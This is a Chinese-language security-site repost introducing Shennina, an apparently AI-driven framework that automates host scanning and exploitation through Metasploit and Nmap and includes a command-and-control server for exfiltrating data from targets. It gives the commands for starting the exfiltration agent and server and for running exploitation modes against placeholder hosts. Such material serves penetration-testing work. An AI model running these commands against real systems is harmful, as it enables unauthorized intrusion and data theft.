Shennina 自动化主机渗透工具

admin
admin
admin
138858
文章
114
评论
2024年4月24日06:36:08评论28 views字数 782阅读2分36秒阅读模式

 

0x01 工具介绍
Shennina是一款功能强大的自动化主机渗透/漏洞利用框架,该项目的主要目的是使用人工智能技术来实现安全扫描、漏洞扫描/分析和漏洞利用开发的完全自动化。Shennina整合了Metasploit和Nmap这两款强大的网络安全工具实现其部分功能,并执行渗透测试。除此之外,该工具还整合了一个命令控制服务器用于从目标主机中自动过滤数据。
0x02 安装与使用
1、过滤服务器-代理
Linux/macOS./exfiltration-server/agent.shWindows./exfiltration-server/agent.ps1
2、过滤服务器-运行
$ cd ./exfiltration-server/$ ./run-server.sh
3、MSFRPCD服务器
./scripts/run-msfrp.py
4、运行服务扫描
$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only
5、以训练模式运行Shennina
$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local
6、渗透测试模式
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode
7、渗透测试模式-启发式
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode

0x03 项目链接

https://github.com/mazen160/shennina

 

原文始发于微信公众号(黑白之道):自动化主机渗透工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日06:36:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Shennina 自动化主机渗透工具https://cn-sec.com/archives/2083898.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息